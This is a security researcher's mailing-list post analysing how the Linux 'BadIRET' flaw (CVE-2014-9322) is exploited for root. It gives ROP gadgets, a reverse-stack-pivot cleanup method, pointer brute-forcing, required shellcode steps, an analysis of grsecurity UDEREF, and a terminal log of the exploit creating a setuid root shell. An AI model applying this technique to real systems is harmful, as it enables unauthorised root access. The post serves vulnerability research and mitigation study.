Date: Sat, 4 Jul 2015 09:23:48 +0200
From: Adam Zabrocki <>
Subject: Follow-up on Exploiting "BadIRET" vulnerability (CVE-2014-9322)


The journey into CVE-2014-9322 is not straightforward, but it is worth spending some time on it and analyzing all the available information. I will try my best...

1) Introduction - non-technical (almost)

Everything starts with CVE-2014-9090. This vulnerability was discovered by Andy Lutomirski and (quoting MITRE):

"The do_double_fault function in arch/x86/kernel/traps.c in the Linux kernel through 3.17.4 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to cause a denial of service (panic) (...)"

which essentially may result in a local DoS attack. That does not sound so critical from the defender's point of view (although it still deserves attention, especially because of the nature of the vulnerability), nor from the attacker's perspective, mainly because of the limited benefits of a successful exploitation.

The "fun" starts after Borislav Petkov asked some questions about CVE-2014-9090. Andy Lutomirski discovered another vulnerability in the same functionality which was masked by the first one. (Un)fortunately, this time it was a very serious (I would say critical) flaw. The Linux kernel does not properly handle faults associated with the Stack Segment (SS) register on the x86 architecture. Quoting MITRE again:

"(...) allows local users to gain privileges by triggering an IRET instruction that leads to access to a GS Base address from the wrong space."

Does the nature of the vulnerability sound familiar?
What about Rafal 'n3rgal' Wojtczuk's research, which ended up receiving CVE-2012-0217? (which was directly connected with CVE-2006-0744).
Yes... in principle both vulnerabilities give us the same thing - we can force the kernel to execute under a user-controlled GS base address (via the %gs register).

For some reason CVE-2014-9322 didn't get much attention (again, similar to CVE-2006-0744) until Rafal 'n3rgal' Wojtczuk pointed it out on 2nd of February 2015 by publishing amazing research on the Bromium Labs blog:

describing how the vulnerability works, how it can be used to achieve code execution (which is not trivial - great research!), and how a single NULL-byte write primitive can be turned into a fully weaponized exploit which bypasses the SMEP mitigation (though not SMAP). Highly recommended to review it in detail.

After this publication the vulnerability started to get more and more attention (especially from the grsecurity twitter account :)). Until now (almost half a year later) there is no known public exploit which fully implements Rafal's idea to achieve code execution. There is only a Proof-of-Concept available which results in a DoS attack (so the same result as CVE-2014-9090 - not very useful):

which ends up being here:

2) More technical part (based on Fedora 20 -> kernel: 3.11.10-301.fc20.x86_64)

I decided to take on the challenge and fully implement Rafal's idea, and I ended up successfully solving some interesting problems along the way. I will start where Rafal finished his write-up, which means we have already successfully pivoted the stack and executed ROP gadgets (in his case disabling SMEP in the CR4 register and executing the 'real' shellcode/kernelcode in a userland page).

*) Stack pivoting and the ROP chain are executed in the context of the follow_link() function, which is inlined in path_openat(). The control flow can be summarized as follows:

SyS_open -> SYSC_open -> do_sys_open -> do_filp_open -> path_openat -> follow_link()

The inlined function does a relative call which in the end transfers control to our code:

   0xffffffff811b84ab <+955>:   jmpq   0xffffffff811b81b3 <path_openat+195>
   0xffffffff811b84b0 <+960>:   movl   $0x4,0x40(%r12)
   0xffffffff811b84b9 <+969>:   mov    0x30(%r15),%rax
   0xffffffff811b84bd <+973>:   mov    %r15,%rdi
   0xffffffff811b84c0 <+976>:   mov    %r12,%rsi
   0xffffffff811b84c3 <+979>:   mov    0x20(%rax),%rax
   0xffffffff811b84c7 <+983>:   callq  *0x8(%rax)
   0xffffffff811b84ca <+986>:   cmp    $0xfffffffffffff000,%rax
   0xffffffff811b84d0 <+992>:   mov    %rax,%r15
   0xffffffff811b84d3 <+995>:   jbe    0xffffffff811b8532 <path_openat+1090>
   0xffffffff811b84d5 <+997>:   mov    %r12,%rdi
   0xffffffff811b84d8 <+1000>:  mov    %eax,%ebx
   0xffffffff811b84da <+1002>:  callq  0xffffffff811b2930 <path_put>

After our code has been executed, the first problems start (the cleanup part). Every call to path_put(), do_last(), dput(), mntput() or put_link() may end up playing with kernel locks. Because the stack is pivoted, this is not going to have a happy ending. Additionally, path_openat() has many functionalities inlined, and some registers have special meaning (pointers to structures/objects) which the kernel will try to access at some point, which may result in a kernel crash and/or panic. At the beginning I was trying to track down every problematic execution path and fix it manually, but there are just too many correlations between registers/objects/spinlocks... (btw. Linux kernel 3.xx changed the internal representation of raw_spin_lock compared to previous kernels, which is (un)fortunately much more problematic when you want to synchronize it manually).
There needed to be a better solution, and if you think about the pivoting itself you may find one. If, instead of manually fixing all the problems, you force the kernel to do it for you, you may win that game. If you find a way to "restore" the original stack frame for the function before the stack pivot was taken, the kernel should naturally release all the locks, correctly unwind the stack, and the system will be stable. This can be achieved via, let's call it, a reverse stack pivot :) Directly after the stack pivot, a temporary register still holds a valid address of the stack which we want to recover. In our case the situation is a bit more complicated because we are losing the 32 most significant bits of the address. The ROP gadget looks like:

   0xffffffff8119f1ed <__mem_cgroup_try_charge+1949>:   xchg   %eax,%esp
   0xffffffff8119f1ee <__mem_cgroup_try_charge+1950>:   retq

Why was this gadget chosen, and why do we lose 32 bits (we want to)? Please read Rafal's write-up.
So if we find some ROP gadget which, directly after the stack pivot, saves the 32 least significant bits of the original stack pointer in a safe place, we can try to restore them and reconstruct the original address before we give control back to the kernel. I've chosen the following ROP gadget:

   0xffffffff8152d8fe <kernel_listen+14>:       push   %rax
   0xffffffff8152d8ff <kernel_listen+15>:       pop    %rax
   0xffffffff8152d900 <kernel_listen+16>:       pop    %rbp
   0xffffffff8152d901 <kernel_listen+17>:       retq

which essentially pushes the %rax value (in fact the high bits are zeroed) and moves the stack pointer past the stored value. At this point we may precisely calculate where it will be stored.

Problem solved (reverse-stack pivot won :P)

*) If your shellcode executes for too long, there is a high chance the scheduler will preempt you, which can sometimes be fatal - it depends on the current stage of execution and on what is going to preempt you. Quite often you may receive an APIC timer interrupt connected with updating process times (known as 'ticking') which may screw you up in some corner cases - it should be taken into account!

btw. if you have bad luck you may be preempted as soon as you do the stack pivot ;p

*) Our code is executed while the proc_root structure is corrupted... :) This is NOT what we would like to have. It dramatically increases the chance of a kernel crash if another process does any operation on the /proc pseudo-filesystem. The proc_root.subdir value must be restored as soon as possible to decrease the chance of a random crash. There are a few possible ways of doing it:

a) instead of overwriting 6 bytes of subdir, overwrite only 5 of them, which leaves 3 bytes untouched. This means we can easily reconstruct the original value by placing 0xffff8800 in the most significant bits (for that kernel) and searching for only 1 unknown byte, which is 256 possibilities. The chance of a crash is very low (touching a non-mapped page). Additionally, this requires allocating around 16 MB in user space to guarantee that referencing the overwritten proc_root.subdir always ends up in memory we control.

b) we can brute force the full address by 'preventing' the Page Fault (#PF). For a short period of time we can overwrite the #PF handler with simple code which will:
- Get the exception frame from the stack
- Change the address which caused the crash to something which we know is mapped
- Restart the faulting instruction

so the original brute-force loop will continue running.

c) Ignore all of these problems, reconstruct as much of the address as we can, and brute force the rest of the bytes. Apparently this is quite reliable and effective. We know that the most significant bytes are 0xffff8800 and we have the 2 least significant bytes. We need to find the 2 bytes which are unknown to us. On Linux (as opposed to Windows) kernel memory is not paged out (swapped out). The chance of hitting an unmapped page is quite low when we brute force just 2 bytes in the middle of the reconstructed address - believe me or not, it works well :)

There is also the problem of how to judge whether an address is correct or not. It's quite simple: struct proc_dir_entry has a 'parent' field. We must find an address which has, at that specific offset, the address of proc_root (which is known). In the end we check 65536 addresses, and the chance of a false positive is low as well - I've never hit that situation.

Summarizing, our shellcode must:
- save original stack pointer value
- disable interrupts (to prevent from being preempted) and start to reconstruct corrupted proc_root.subdir value
- do REAL (s)hellcode
- restore original stack pointer
- restore frame pointer
- restore registers pointing to the internal objects
- enable interrupts and return to the normal kernel execution

3) Grsecurity => UDEREF

As I mentioned, Rafal's research has been "sighted" by spender via:

Additionally, some people suggested that UDEREF is as effective as SMAP at blocking exploitation of this vulnerability:

"This is likely to be easy to exploit for privilege escalation, except
on systems with SMAP or UDEREF.  On those systems, assuming that the
mitigation works correctly, the impact of this bug may be limited to
massive memory corruption and an eventual crash or reboot."

This is not completely true. UDEREF may be as effective as SMAP (in fact even more effective), or only as effective as SMEP (on AMD64), which will not prevent exploitation at all (using the described technique). So what's going on? :) Currently UDEREF for AMD64 has 3 different implementations:

- slow / weak legacy implementation
- strong implementation on Sandy Bridge and later
- fast / weak implementation on Sandy Bridge and later

The first implementation of UDEREF on AMD64 was the "weak" implementation, and information about it was described by the PaX team here:

I will quote the essential part of it:

"(...) so what does UDEREF do on amd64? on userland->kernel transitions it basically
unmaps the original userland address range and remaps it at a different address
using non-exec/supervisor rights (so direct code execution as used by most
exploits is not possible at least). (...)"

and next:

"(...) UDEREF/amd64 doesn't ensure that the (legitimate) userland accessor
functions cannot actually access kernel memory when only userland is allowed
(some in-kernel users of certain syscalls can temporarily access kernel memory
as userland, and that is enforced on UDEREF/i386 but not on amd64). so if
there's a bug where userland can trick the kernel into accessing a userland
pointer that actually points to kernel space, it'll succeed, unlike on i386.

the other bad thing is the presence of the userland shadow area. this has
two consequences: 1. the userland address space size is smaller under UDEREF
(42 vs. 47 bits, with corresponding reduction of ASLR of course), 2. this
shadow area is always mapped so kernel code accidentally accessing its range
may not oops on it and can be exploited (such accesses can usually happen only
if an exploit can make the kernel dereference arbitrary addresses in which
case the presence of this area is the least of your concerns though).(...)"

== weak UDEREF ==
This means it works essentially like SMEP. So how do we exploit CVE-2014-9322 under this specific implementation of UDEREF? You just need to change the ROP chain. Instead of disabling the SMEP bit in the CR4 register and executing code from userland, implement the full shellcode as ROP. It is possible, and it won't be stopped by the weak implementation of UDEREF.

== "new" UDEREF ==
Why is the strong implementation of UDEREF different, and why does it require the Sandy Bridge architecture?
Yes, that's the fun part. I haven't seen any official write-up regarding the "new" UDEREF. I wasn't even aware of those changes while I was working on this exploit :)

The strong implementation of UDEREF uses a Sandy Bridge++ feature called PCID to 'tag' entries in the TLB. By doing this, UDEREF can completely separate userland from the kernel (via creating new PGD tables):

 static inline void enter_lazy_tlb(struct mm_struct *mm, struct task_struct *tsk)
+#if defined(CONFIG_X86_64) && defined(CONFIG_PAX_MEMORY_UDEREF)
+	if (!(static_cpu_has(X86_FEATURE_PCID))) {
+		unsigned int i;
+		pgd_t *pgd;
+
+		pax_open_kernel();
+		pgd = get_cpu_pgd(smp_processor_id(), kernel);
+		for (i = USER_PGD_PTRS; i < 2 * USER_PGD_PTRS; ++i)
+			set_pgd_batched(pgd+i, native_make_pgd(0));
+		pax_close_kernel();
+	}

+#if defined(CONFIG_X86_64) && defined(CONFIG_PAX_MEMORY_UDEREF)
+		if (static_cpu_has(X86_FEATURE_PCID)) {
+			if (static_cpu_has(X86_FEATURE_INVPCID)) {
+				u64 descriptor[2];
+				descriptor[0] = PCID_USER;
+				asm volatile(__ASM_INVPCID : : "d"(&descriptor), "a"(INVPCID_SINGLE_CONTEXT) : "memory");
+				if (!static_cpu_has(X86_FEATURE_STRONGUDEREF)) {
+					descriptor[0] = PCID_KERNEL;
+					asm volatile(__ASM_INVPCID : : "d"(&descriptor), "a"(INVPCID_SINGLE_CONTEXT) : "memory");
+				}
+			} else {
+				write_cr3(__pa(get_cpu_pgd(cpu, user)) | PCID_USER);
+				if (static_cpu_has(X86_FEATURE_STRONGUDEREF))
+					write_cr3(__pa(get_cpu_pgd(cpu, kernel)) | PCID_KERNEL | PCID_NOFLUSH);
+				else
+					write_cr3(__pa(get_cpu_pgd(cpu, kernel)) | PCID_KERNEL);
+			}
+		} else

In the end, a context running in kernel mode will NOT see any usermode pages. I personally believe this implementation is much stronger than SMAP. Why?

1. You can't just clear one bit in the CR4 register to fully turn off this mitigation.
2. In the case of SMAP, you can see userland pages (there are existing page tables translating userland addresses - the 'P' bit is set) but you just can't touch them. With the "new" UDEREF you don't see userland at all (the PGD is completely different for the kernel context and there are no page tables describing userland addresses - the 'P' bit is unset).

This version of UDEREF was first introduced in grsecurity version 3.0 in February 2014. Good work! It would be nice if PaX/grsecurity published some details of their research and great implementation :)

Btw. in both cases the result of touching userland addresses is the same - a #PF will be generated :)
Btw2. the same "strong" UDEREF functionality may be achieved without the hardware PCID feature. The main difference is performance - without hardware support for PCID it would be a mess from the performance point of view.

== Summarizing ==
This vulnerability can be exploited under the weak UDEREF and can NOT be exploited under the "new" UDEREF which is enabled on the Sandy Bridge++ architecture.

In fact, you can still use this vulnerability to fully DoS the machine under the "new" UDEREF. How? It's quite funny and tricky: you can force an infinite loop of #PFs :) As soon as the kernel enters the do_general_protection() function, it tries to read per-CPU data via the GS base by executing the following instruction:

    0xffffffff8172910e <do_general_protection+30>:       mov    %gs:0xa880,%rbx

In this situation the GS base points to userland memory. Because there is no PTE entry for that address (the kernel context doesn't see userland at all), a #PF is generated. The page_fault() function is executed and the following happens:

page_fault -> do_page_fault -> __do_page_fault -> restore_args

it tries the same read again, the next #PF is generated, and so on... and so on... :) So yes, you can still crash the kernel, but there is no way to do anything else, because there is no room for exploitation at all. The vulnerability is stopped in principle.

4) Funny facts :)

a) Some versions of libpthread require memory with RWX permissions to be created when you call the pthread_create() function. This is not allowed under the PaX/grsec hardening of mmap(), and as soon as the internal implementation of pthread_create() calls mmap(), the process is killed :) I ran into this situation on a default installation of Ubuntu LTS where I was testing a kernel with grsecurity hardening.

b) on kernel 3.11.10-301.fc20.x86_64 the implementation of the __switch_to() function uses the OSXSAVE extension (bit 18 in the CR4 register) without checking whether the CPU has this extension or not:

     0xffffffff81011714 <__switch_to+644>    xsaveopt64 (%rdi)

__switch_to() is executed with interrupts disabled, but if the OSXSAVE extension is not enabled the CPU will generate a #UD and the result is a deadlock. Additionally, before entering __switch_to() (and regardless of the disabled interrupts), the runqueue is locked, and it will never be unlocked in case of a #UD.
I wonder if someone has hit this problem in real life :)

c) Fedora 20 exploitation is pretty stable (source code available on my website):

[pi3@...alhost clean_9322]$ cat z_shell.c
#include <stdio.h>
#include <unistd.h>

int main(void) {

   char *p_arg[] = { "/bin/sh", NULL };

   /* presumed missing part of the listing: regain root and spawn a shell */
   setuid(0); setgid(0);
   execve(p_arg[0], p_arg, NULL);
   return 0;
}

[pi3@...alhost clean_9322]$ gcc z_shell.c -o z_shell
[pi3@...alhost clean_9322]$ cp z_shell /tmp/pi3
[pi3@...alhost clean_9322]$ ls -al /tmp/pi3
-rwxrwxr-x 1 pi3 pi3 8764 May  6 23:09 /tmp/pi3
[pi3@...alhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@...alhost clean_9322]$ /tmp/pi3
sh-4.2$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
sh-4.2$ exit
[pi3@...alhost clean_9322]$ gcc -o procrop procrop.c setss.S
[pi3@...alhost clean_9322]$ gcc -o p_write8 swapgs.c setss.S -lpthread
swapgs.c: In function ‘main’:
swapgs.c:175:29: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
               : "r"(4), "r"((int)p_to_d), "r"(1)
[pi3@...alhost clean_9322]$ ./procrop

        ...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
                           by Rafal 'n3rgal' Wojtczuk
                           && Adam 'pi3' Zabrocki

                Usage: ./procrop <number>


                                1 - kernel [3.11.10-301.fc20.x86_64]

[pi3@...alhost clean_9322]$ ./procrop 1 &
[1] 5827
[pi3@...alhost clean_9322]$
        ...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
                           by Rafal 'n3rgal' Wojtczuk
                           && Adam 'pi3' Zabrocki

        [+] Using kernel target: 3.11.10-301.fc20.x86_64

[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$ ps aux |grep procr
pi3       5827 83.0  0.0   4304   320 pts/1    RL   23:12   0:05 ./procrop 1
pi3       5829  0.0  0.1 112660   916 pts/1    S+   23:12   0:00 grep --color=auto procr
[pi3@...alhost clean_9322]$ ./p_write8

        ...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
                           by Rafal 'n3rgal' Wojtczuk
                           && Adam 'pi3' Zabrocki

                Usage: ./p_write8 <number>


                                1 - kernel [3.11.10-301.fc20.x86_64]

[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$ ./p_write8 1

        ...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
                           by Rafal 'n3rgal' Wojtczuk
                           && Adam 'pi3' Zabrocki

        [+] Using kernel target: 3.11.10-301.fc20.x86_64
        [+] mmap() memory in first 2GB of address space... DONE!
        [+] Preparing kernel structures... DONE! (ovbuf at 0x602140)
        [+] Creating LDT for this process... DONE!
        [+] Press enter to start fun-game...
[exploit] pthread 
Done                    ./procrop 1
Segmentation fault (core dumped)
[pi3@...alhost clean_9322]$ ls -al /tmp/pi3
-rwsrwsrwx 1 root root 8764 May  6 23:09 /tmp/pi3
[pi3@...alhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@...alhost clean_9322]$ /tmp/pi3
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1000(pi3)
sh-4.2# exit
[pi3@...alhost clean_9322]$


Best regards,
Adam 'pi3' Zabrocki

pi3 (pi3ki31ny) - pi3 (at) itsec pl
